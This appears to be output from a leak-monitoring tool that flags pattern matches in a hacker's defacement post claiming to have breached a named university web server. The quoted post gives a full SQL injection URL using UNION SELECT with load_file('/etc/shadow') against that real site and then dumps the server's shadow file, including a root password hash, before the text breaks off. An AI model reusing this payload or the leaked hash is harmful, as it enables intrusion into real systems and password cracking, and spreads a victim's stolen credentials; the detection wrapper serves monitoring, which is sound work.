Detected 1 occurrence(s) of ‘(h[a4]ck[e3]d|[p0]wn[e3]d|d[e3]f[a4]c[e3]d) by’: UFBA HACKED BY SUP3RM4N METODO : SQL INJECTION MANUAL COM REMOTE CODE EXECUTION http://www.ppgee.eng.ufba.br/main.php?page=pagina&id=20+union+select+1,load_file('/etc/shadow'),3,4,5,6,7-- LOGINS DO SERVER root:$1$tmOBixVi$h/t6jOgSqKQOTiUuSfwSb1:15680:0:99999 Detected 1 occurrence(s) of ‘root:.*:0:99999:7:::’: UFBA HACKED BY SUP3RM4N METODO : SQL INJECTION MANUAL COM REMOTE CODE EXECUTION http://www.ppgee.eng.ufba.br/main.php?page=pagina&id=20+union+select+1,load_file('/etc/shadow'),3,4,5,6,7-- LOGINS DO SERVER root:$1$tmOBixVi$h/t6jOgSqKQOTiUuSfwSb1:15680:0:99999:7::: bin:*:14049:0:99999:7::: daemon:*:14049:0:99999:7::: adm:*:14049:0:99999:7::: lp:*:14049:0:99999:7::: sync:*:14049:0:99999:7::: shutdown:*:14049:0:99999:7::: halt:*:14049:0:99999:7::: mail:*:14049:0:99999:7::: […]
↧